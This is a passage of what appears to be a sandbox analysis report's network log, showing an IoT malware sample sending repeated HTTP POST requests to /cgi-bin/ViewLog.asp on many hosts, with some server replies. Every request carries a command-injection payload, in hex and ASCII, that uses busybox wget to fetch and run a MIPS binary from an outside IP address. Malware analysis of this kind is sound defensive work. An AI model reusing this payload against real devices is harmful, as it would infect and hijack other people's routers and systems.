                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.422215939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.542215109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.782187939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.390192032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.350152969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              666192.168.2.135484894.120.222.428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.841058016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              667192.168.2.133357294.122.89.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.841984034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              668192.168.2.134050431.200.63.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.845139027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              669192.168.2.133685095.217.95.2228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.032787085 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.228754044 CET212INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain
                                              Date: Thu, 23 Nov 2023 04:18:04 GMT
                                              Content-Length: 18
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              670192.168.2.135365831.136.55.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.063153982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.646214962 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.798178911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.294204950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.902156115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.118145943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              671192.168.2.135943494.158.131.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.090737104 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.222196102 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.534198999 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.318173885 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.694161892 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              672192.168.2.135986895.84.150.2548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.096684933 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.301285028 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              673192.168.2.135260294.154.84.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.120994091 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.418226957 CET432INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 130
                                              X-Frame-Options: SAMEORIGIN
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              674192.168.2.133577694.23.217.1788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.243689060 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.420746088 CET142INHTTP/1.0 400 Bad Request
                                              Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                              Data Ascii: Client sent an HTTP request to an HTTPS server.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              675192.168.2.135307431.136.33.2408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.247555971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.806204081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
